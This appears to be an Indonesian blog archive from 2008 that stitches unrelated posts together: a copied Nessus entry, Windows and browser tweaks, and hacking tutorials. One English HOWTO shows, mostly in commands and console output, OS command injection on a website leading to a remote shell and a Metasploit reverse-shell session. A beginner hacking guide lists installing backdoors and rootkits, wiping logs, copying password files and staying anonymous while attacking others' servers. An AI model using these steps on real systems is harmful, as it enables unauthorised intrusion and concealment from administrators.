Jumat, 19 Desember 2008

Nessus (software)

For other uses, see Nessus.
Nessus
Developed by
Tenable Network Security
Latest release
3.2.1 / May 30, 2008

OS
Cross-platform

Type
Vulnerability scanner

License
Proprietary

Website
www.nessus.org

In computer security, Nessus is a proprietary comprehensive vulnerability scanning software. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
• Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
• Misconfiguration (e.g. open mail relay, missing patches, etc).
• Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
• Denials of service against the TCP/IP stack by using mangled packets
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system.
Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000 organizations worldwide. It took first place in the 2000, 2003, and 2006 security tools survey from SecTools.Org.
Operation
In typical operation, Nessus begins by doing a port scan with one of its four internal portscanners (or it can optionally use Amap or Nmap [1]) to determine which ports are open on the target and then tries various exploits on the open ports. The vulnerability tests, available as subscriptions, are written in NASL (Nessus Attack Scripting Language), a scripting language optimized for custom network interaction.
Tenable Network Security produces several dozen new vulnerability checks (called plugins) each week, usually on a daily basis. These checks are available for free to the general public seven days after they are initially published. Nessus users who require support and the latest vulnerability checks should contact Tenable Network Security for a Direct Feed subscription which is not free. Commercial customers are also allowed to access vulnerability checks without the seven-day delay.
Optionally, the results of the scan can be reported in various formats, such as plain text, XML, HTML and LaTeX. The results can also be saved in a knowledge base for reference against future vulnerability scans. On UNIX, scanning can be automated through the use of a command-line client. There exist many different commercial, free and open source tools for both UNIX and Windows to manage individual or distributed Nessus scanners.
If the user chooses to do so (by disabling the option 'safe checks'), some of Nessus's vulnerability tests may try to cause vulnerable services or operating systems to crash. This lets a user test the resistance of a device before putting it in production.
Nessus provides additional functionality beyond testing for known network vulnerabilities. For instance, it can use Windows credentials to examine patch levels on computers running the Windows operating system, and can perform password auditing using dictionary and brute force methods. Nessus 3 can also audit systems to make sure they have been configured per a specific policy, such as the NSA's guide for hardening Windows servers.
History
The "Nessus" Project was started by Renaud Deraison in 1998 to provide to the Internet community a free remote security scanner. Nessus is currently rated among the top products of its type throughout the security industry and is endorsed by professional information security organizations such as the SANS Institute.
On October 5, 2005, Tenable Network Security [2], the company Renaud Deraison co-founded, changed Nessus 3 to a proprietary (closed source) license [3]. The Nessus 3 engine is still free of charge, though Tenable charges $100/month per scanner for the ability to perform configuration audits for PCI, CIS, FDCC and other configuration standards, technical support, SCADA vulnerability audits, the latest network checks and patch audits, the ability to audit anti-virus configurations and the ability for Nessus to perform sensitive data searches to look for credit card, social security number and many other types of corporate data. Nessus 3 is also roughly 10 times faster [4] than Nessus 2.
As of July 31, 2008, Tenable sent out a revision of the feed license which will allow home users full access to plugin feeds. A professional license is available for commercial use[5].
The Nessus 2 engine and a minority of the plugins are still GPL. Some developers have forked independent open source projects based on Nessus, but none of them achieved a stable state yet. Tenable Network Security has still maintained the Nessus 2 engine and has updated it several times since the release of Nessus 3.
Nessus 3 is available for many different UNIX and Windows systems, offers patch auditing of UNIX and Windows hosts without the need for an agent and is 2-5 times faster [6] than Nessus 2.
There is a split-off project called OpenVAS that continues to develop a GPLed vulnerability scanner based on Nessus 2.

HOWTO-Integrate w3af with Metasploit

HOWTO-Integrate w3af with Metasploit

Objective:Learnhowtousetheadvancedexploitationtechniquesofw3afframework.
Summary: This is how to explain how the process of execution of payloads and exploit the tool
Metasploitfromtheconsoleusingw3afvirtualdaemon.
Requiredw3afversion:ThisHOWTOappliestow3afversionsbeta5andgreater.
Steps
First of all, please read the user's guide , this series of HOWTO documents don't replace the documentation, which gives a much more general knowledge of the framework and it's features. With that said lets start with the steps you have to follow in order to advanced exploiting:

Note: To use this feature we have installed the Metasploit framework version 3.0 or higher; can get free from the official
site www.metasploit.com, installation and configuration of MSF is not in the scope of this HOWTO.
• STEP1 - To use the virtual daemon is necessary to run the tool with the following parameter:
# ./w3af -i /home/user/workspace/msf/
Successfully installed Virtual Daemon.
w3af>>>
It is important to mention that the path "/home/user/workspace/msf/" is the directory where you installed the
MSF.
We can see this in w3af execution with virtual daemon installed.
• STEP2 - Using plugins discovery will try to identify the various points of injections. In this example we will use the following:
w3af>>>plugins discovery allowedMethods webSpider
w3af>>>target set target http://www.hackme.com/
w3af>>>start
The following is a list of that were found by the webSpider plugin:
- http://www.hackme.com/dina2.jpg [ http://www.hackme.com/ ]
- http://www.hackme.com/tg.gif [ http://www.hackme.com/ ]
- http://www.hackme.com/pagead/show_ads.js [ http://www.hackme.com/ ]
- http://www.hackme.com/stats.asp [ http://www.hackme.com/ ]
- http://www.hackme.com/urchin.js [ http://www.hackme.com/ ]
- http://www.hackme.com/pub/shockwave/cabs/flash/swflash.cab [ http://www.hackme.com/ ]
- http://www.hackme.com/poetry/bienvenue.php [ http://www.hackme.com/ ]
- http://www.hackme.com/js/counter.js [ http://www.hackme.com/ ]
- http://www.hackme.com/loose.dtd [ http://www.hackme.com/ ]
Found 3 URLs and 3 different points of injection.
The list of URLs is:
- http://www.hackme.com/
- http://www.hackme.com/index.php?ir=results.php&page=1
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php
The list of fuzzable requests is:
- http://www.hackme.com/ | Method: GET
- http://www.hackme.com/index.php?ir=results.php&page=1 | Method: POST | Parameters: (search)
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php | Method: POST | Parameters: (autor)
w3af>>>
As a result we have discovered some URLs, which could contain vulnerabilities. A special case is the "index.php" file which has the query string parameter "page". Let's see how ...
• STEP3 - Activating the osCommanding audit plugin, and setting the target URL http://www.hackme.com/index.php?ir=result.php&page=hack%%
w3af>>>target set target http://www.hackme.com/index.php?ir=result.php&page=hack%%
w3af>>>plugins audit osCommanding
w3af>>>start
Found 3 URLs and 3 different points of injection.
The list of URLs is:
- http://www.hackme.com/index.php
- http://www.hackme.com/index.php?ir=results.php&page=1
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php
The list of fuzzable requests is:
- http://www.hackme.com/index.php | Method: GET | Parameters: (ir,page)
- http://www.hackme.com/index.php?ir=results.php&page=1 | Method: POST | Parameters: (search)
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php | Method: POST | Parameters: (autor)
Starting osCommanding plugin execution.
100% [====================================================] 3/3
A possible OS Commanding was found at: http://www.hackme.com/index.php . Using method: GET. The data sent was: ir=run+ping+-n+3+localhost&page=hack%% . Please review manually. This information was found in the request with id 58.
By changing in unexpected ways to implement the value received by the URL (page = hack%%) we can see that the web service is not properly validating the value.
Knowing this we can take control of the application and execute arbitrary code including a file to another server.
• STEP4 - Exploit the vulnerability identified using plugins exploit.
w3af>>>exploit exploit *
Using plugin: osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited
No [blind] sql injection vulnerabilities have been found.
Hint #1: Try to find vulnerabilities using the audit plugins.
Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.
Using plugin: googleProxy
google proxy listening on 127.0.0.1:44446
Vulnerability successfully exploited.
This is a list of available shells:
- [0]
- [1]
Please use the interact command to interact with the shell objects.
w3af>>>
I get a list of available shells. Interact With the command shell that could select run.
3af/exploit>>> interact 1
Execute "endInteraction" to get out of the remote shell. Commands typed in
this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell-1>>> whoami
www-data
w3af>>>

• STEP5 - Launch Virtual Daemon and integrate Metasploit.
w3af/exploit/osCommandingShell-1>>> start vdaemon
Virtual daemon service is running on port 9091, use metasploit's w3af_vdaemon module to exploit it.
w3af/exploit/osCommandingShell-1>>>

• STEP6 - Start tool Metasploit Framework Web Console and configure the Virtual exploit w3af Daemon exploit.
root@nb:/home/user/workspace/mfs# ./msfweb

[*] Starting msfweb v3.2-release on http://127.0.0.1:55555/

=> Booting WEBrick...
[*] WEBrick directory traversal patch loaded
=> Rails application started on http://127.0.0.1:55555
=> Ctrl-C to shutdown server; call with --help for options
[2008-05-28 17:50:13] INFO WEBrick 1.3.1
[2008-05-28 17:50:13] INFO ruby 1.8.6 (2007-06-07) [i486-linux]
[2008-05-28 17:50:13] INFO WEBrick::HTTPServer#start: pid=11541 port=55555
Once we have the service up, enter the browser and put the port that this listening msf, http://localhost:55555.
After clicking on "Exploit" on the main menu, you'll see a small window where we can find the name of the writ (w3af) and select as shown in following picture.


We select the operating system and payloads to run. At this stage we must indicate certain parameters: rhost (IP addresses to attack), Lhoste (publicIPaddress),LPORT(portwhichitwillusetoconnect).


By completing the parameters we can run it by clicking on Launch Exploit. You get a window showing detailed process. If this is successful
wemaytakeaOperativeSystemSheel.



And get shell !!!
[*] Started reverse handler
[*] The remote ip address is: 172.16.1.128
[*] Using remote IP address to create payloads.
[*] Sent payload to vdaemon.
[*] The estimated time to wait for the extrusion scan to complete is: 1 seconds.
[*] Done waiting!
[*] The estimated time to wait for PE/ELF transfer is: 8 seconds.
[*] Waiting...
[*] Done waiting!
[*] Going to wait for 27 seconds (waiting for crontab/at to execute payload).
[*] The session could start before the handler, so please *be patient*.
[*] Command shell session 1 opened (172.16.1.10:4444) -> 172.16.1.128:1047)
[*] Done waiting!
[*] Starting handler
Portions not contributed by visitors are Copyright 2008 Tangient LLC.

Memahami Cara Kerja Free Hide Folder 2.0 dan Cara Kerja Windows vista,XP,

Berkaitan dengan tulisan maseko yang berjudul “Free Hide Folder“, saya pun tertarik untuk mengunduhnya. Setelah saya mengunduhnya, saya langsung mencobanya setelah pulang ke rumah. Saya instal, dan pada akhir instalasi saya di “suruh” untuk memasukkan password. Setelah selesai, saya coba menyembunyikan folder “My Documents” pada drive D, dan berhasil.
Saya langsung mencoba membuka Windows Explorer, mengklik [Tools] > [Folder Options], lalu masuk ke tab [View] dan memilih [Show hidden files and folders] dan juga menghilangkan tanda checklist [Hide protected operating system files (Recommended)] untuk memperlihatkan seluruh folder biasa dan folder sistem yang tersembunyi, tapi hasilnya nihil. Saya coba paksa masuk dengan mengetik “D:\My Documents” pada Address bar, malah keluar pesan error “Cannot find ‘file:///D:/My%20Documents’. Make Sure the path or Internet address is correct.” Dan saya pun mengakui kehebatan program ini, tapi setelah beberapa saat, saya merasakan keanehan, seluruh folder tersembunyi malah tidak terlihat, walaupun sudah di-setting pada Folder Options, tetap saja folder tersembunyi lainnya tidak muncul juga.
Iseng-iseng saya mencoba cara klasik lewat Command Prompt, saya ketikkan “dir /a:s /a:h” dengan tujuan menampilkan semua folder dan file yang tersembunyi. Dan setelah melihat list folder dan file tersembunyi, saya merasa janggal dengan folder bernama “CHKDSK.100ÿÿ“, saya merasa belum pernah membuat dan melihatnya. Dengan senyuman kecil saya mengetikkan “D:\CHKDSK.100ÿÿ” pada Address bar Windows Explorer, Dan…saya pun masuk ke folder yang disembunyikan oleh Free Hide Folder.
Akhirnya, saya mengerti cara kerja program ini, jadi program ini men-setting agar Windows Explorer dibuat “buta” sehingga tidak dapat melihat folder tersembunyi. Lalu ketika kita memilih suatu folder untuk disembunyikan olehnya, program ini langsung me-rename-nya ke nama yang aneh sehingga membuat seseorang mengira folder yang di-hide benar-benar tidak ada. Dan jika ada lebih dari satu folder yang di-hide, maka ia akan me-rename folder selanjutnya sedikit berbeda dengan yang pertama, kalau yang pertama bernama “CHKDSK.100ÿÿ”, maka yang kedua akan bernama “CHKDSK.101ÿÿ”, dan seterusnya. Memang kita tidak bisa menuntut kesempurnaan sebuah program, apalagi program ini freeware, dan saya tidak jadi mengakui kehebatan program ini :P. Oh iya, satu kalimat yang harus diingat, “Banyak Jalan Menuju Roma”.
FlashGet, aplikasi download manager yang sangat digemari karena gratis dan cepat. Tapi, kalau dilihat dari segi kecepatan, sebenarnya FlashGet bisa dibilang kurang cepat, karena masih ada aplikadi download manager lain yang jauh lebih cepat dibanding FlashGet. FlashGet hanya bisa mengunduh sebanyak masksimal 8 file sekaligus dan membelah atau split 1 file menjadi 10 bagian. Jauh berbeda dengan aplikasi download manager lainnya yang bisa mengunduh 16 file sekaligus dan membelah 1 file menjadi 16 bagian.
Perbedaan ini bisa berpengaruh besar, seandainya FlashGet bisa mengunduh lebih banyak, pasti waktu mengunduh menjadi lebih cepat. Sebenarnya FlashGet bisa saja mengunduh file maksimal sebanyak 100 file sekaligus dan membelah 1 file menjadi 30 bagian. Anda harus melakukan beberapa langkah tersembunyi ini untuk mendpatkan hasil seperti yang dibahas di atas tadi, tapi ingat sebelum melakukan pengaturan terhadap FlashGet, matikan dulu FlashGet dari Windows. Begini caranya
:
1. Buka Registry Editor, klik [Start] > [Run], ketik regedit.exe dan klik [OK].
2. Masuk ke HKEY_CURRENT_USER\Software\JetCar\JetCar\General.
3. Klik kanan pada jendela sebelah kanan, pilih [New] > [DWORD Value] untuk membuat value baru, beri nama Max Parallel Num. Klik ganda value tersebut pilih [Decimal] pada bagian [Base], lalu isi Value data dengan nilai sebesar 100 dan tekan [Enter].
4. Setelah itu, klik kanan lagi, pilih [New] > [DWORD Value], beri nama MaxSimJobs. Klik ganda dan pilih [Decimal], isi Value data dengan 100, klik [OK].
5. Tutup Registry Editor dan restart PC.
6. Setelah PC di restart, buka FlashGet milik Anda.
7. Klik [Tools] > [Options...], masuk ke bagian [Connection]. Isi atau ubah [Max simultaneous jobs] menjadi 8, klik [OK].
8. Klik [Tools] > [Default Downlod Properties...]. Isi atau ubah [maximum part for main site] dengan nilai 10, klik [OK].
Dengan langkah-langkah diatas tadi, ini bisa membuat FlashGet jauh lebih cepat dan juga membuat Anda semakin suka dengan FlashGet. Selamat mencoba!
Sejak Windows tampil dengan GUI (Graphic User Interface), setiap kali mau masuk ke Windows selalu ada tampilan yang namanya bootscreen. Tampilan bootscreen sangat sederhana, hanya sebuah logo Windows dan loadng bar di bawahnya.
Durasi bootscreen tampil bergantung pada pengaturan sistem pada Windows (XP), jika pengaturan biasa bisa sekitar 10 detik bahkan lebih, dan jika di atur dengan optimal bisa 1 atau 2 detik saja!
Tapi pernahkah Anda berpikir, sebenarnya, apa yang di lakukan Windows di balik bootscreen yang ditampilkan olehnya. Seperti yang Windows lakukan di balik Welcome screen ketika login dan logoff, tapi itu sudah pernah dibahas.
Jika Anda penasaran dengan kegiatan Windows di balik bootscreen-nya, Anda bisa mengikuti beberapa langkah singkat
dibawah ini:
1. Pertama-tama, klik [Start] > [All Programs] > [Accessories] > [Windows Explorer] untuk membuka Windows Explorer. Atau Anda bisa tekan tombol [Windows] > [E] pada keyboard supaya lebih cepat.
2. Ketik x:\boot.ini pada Address bar, x adalah kandar atau drive dimana Windows diinstal.
3. Lalu tambahkan /SOS setelah /fastdetect, simpan dan restart PC.
Coba sekarang Anda lihat bootscreen, jangan terkejut apabila bootscreen Anda hilang. Lakukan backup sebelum melakukan hal-hal diatas!
Mozilla Firefox adalah browser kedua paling banyak digunakan di seluruh dunia setelah Internet Explorer. Lebih baik, lebih aman, dan lebih cepat (better, safer, faster) yang membuat Firefox lebih disukai, dibandingkan Internet Explorer dengan versi 7, dan ada kabar burung katanya diperkirakan Internet Explorer 7 mempunyai sekitar 8000 bug! Karena itu Microsoft akan segera merilis Internet Explorer 8.
Kita kembali ke topik utama yaitu Firefox, dibilang lebih baik, memang benar karena ia memiliki segi User Interface yang bagus ditambah banyaknya pilihan skin yang menarik dan juga stabil. Dibilang lebih aman, memang benar juga, ia mempunyai tingkat keamanan yang sangat tinggi. Dibilang lebih cepat, tidak juga, karena ada dua browser lagi yang mempunyai kecepatan lebih baik, yakni Opera dan Safari dengan tampilan yang tidak kalah menarik, kemanan yang juga tinggi.
Kalau Anda masih cinta dengan Firefox dan tidak jatuh hati kepada dua browser tadi, Anda bisa membuat Anda lebih sayang lagi dengan browser open source ini. Anda bisa meningkatkan performa Firefox dengan beberapa trik berikut
:
1. Buka Firefox Anda, lalu ketik about:config pada address bar.
2. Cari browser.tabs.showSingleWindowModePrefs dan klik ganda untuk mengaktifkannya.
3. Cari network.http.max-connections, klik ganda dan ganti value-nya dengan 48, klik [OK].
4. Pada baris berikutnya, network.http.max-connections-per-server, klik ganda dan ganti value-nya dengan 16, klik [OK].
5. Pada baris berikutnya lagi, network.http.max-persistent-connections-per-proxy, klik ganda dan ganti dengan 8, tekan [Enter].
6. Pada baris dibawahnya, network.http.max-persistent-connections-per-server, klik ganda dan ganti dengan 4, klik [OK].
7. Pada baris berikutnya, network.http.pipelining, klik ganda untuk merubah value-nya menjadi True.
8. Pada baris berikutnya lagi, network.http.pipelining.maxrequests, klik ganda dan ganti value-nya dengan 100, klik [OK].
9. Cari network.http.proxy.pipelining, klik ganda untuk mengaktifkannya.
10. Lalu cari network.http.request.timeout, klik ganda dan isi dengan 300, klik [OK].
11. Kemudian, klik kanan dan pilih [New] > [Integer], beri nama nglayout.initialpaint.delay, klik [OK]. Lalu pada jendela berikutnya, isi dengan 0 dan klik [OK].
12. Restart Firefox.
Fitur Microsoft Office 2007 yang satu ini mungkin sudah banyak orang yang mengetahuinya, yaitu fitur Color Scheme, tapi tidak ada salahnya saya membahasnya kembali lewat artikel ini. Fitur Color scheme memungkinkan kita untuk mengganti warna tampilan Microsoft Office, misalnya warna default dari Microsoft Office adalah Blue (biru muda), kalau bosan, kita bisa mengubahnya menjadi warna Silver (abu-abu) atau Black (hitam).
Caranya sangat mudah, buka salah satu aplikasi Microsoft Office 2007. Klik logo Office di pojok kiri atas dan klik lagi [X Options], huruf X bisa berarti Word, Excel, Access, Powerpoint, atau aplikasi Office lainnya tergantung aplikasi mana yang Anda buka. Nah, ganti Color scheme menjadi warna yang Anda inginkan, di sini terdapat 3 pilihan, Blue, Silver, dan Black. Jika sudah memilih, klik [OK] dan lihat perubahannya. Perubahan Color scheme pada satu aplikasi Office akan berpengaruh dengan aplikasi Office lainnya.

Kamis, 18 Desember 2008

Belajar Hack Yuck! (1) - Konsep Dasar Hacking

Intro

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.





Bagian 1

*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.



Hacking buat pemula

- by DC

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

Pro dan Kontra Hacking



Pro


Kontra

Etika Hacking


Semua informasi adalah free


Jika semua informasi adalah free, maka tidak ada ladi privacy

Aspek Security


Intrusion adalah ilustrasi kelemahan sistem


Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci

Idle Machines


Hacking hanya pada idle machines


idle machines milik siapa ?

science education


hanya membobol tapi tidak merusak


“hacker wannabe” berpotensi sangat besar untuk merusak

Okeh, sekarang waktunya melakukan aksi…



1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

- Secara Aktif : - portscanning

- network mapping

- OS Detection

- application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)

- via internet registries (informasi domain, IP Addres)

- Website yang menjadi terget



2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

- Secara berulang melakukan percobaan otentifikasi.

- Menebak username dan password.

- Cracking password file

~ Social Engineering

- Memperdayai user untuk memeberi tahu Username dan password

- Intinya ngibulin user….



3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!



Referensi :

-Hacking and Defense, Jim Geovedi, negative@magnesium.net

-Network Defense, Jim Geovedi, negative@magnesium.net



Possibly related posts: (automatically generated)

* Friendster Palsu
* Jangan dioperasi, katanya !
* Hacking buat pemula
* LIVE!!!

BELAJAR JADI HACKERS

____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/


.OR.ID
ECHO-ZINE RELEASE
08

Author: y3dips || y3dips@echo.or.id
Online @ www.echo.or.id :: http://ezine.echo.or.id

==== F.A.Q for NEWBIES Version 1.0 ===

Intr0
-----

Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya )

Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.

Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.

Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .



[F.A.Q]

[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."

[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.

Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri

T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!

T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet

T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!

T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com

T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni

T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)

[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.

[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.

[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
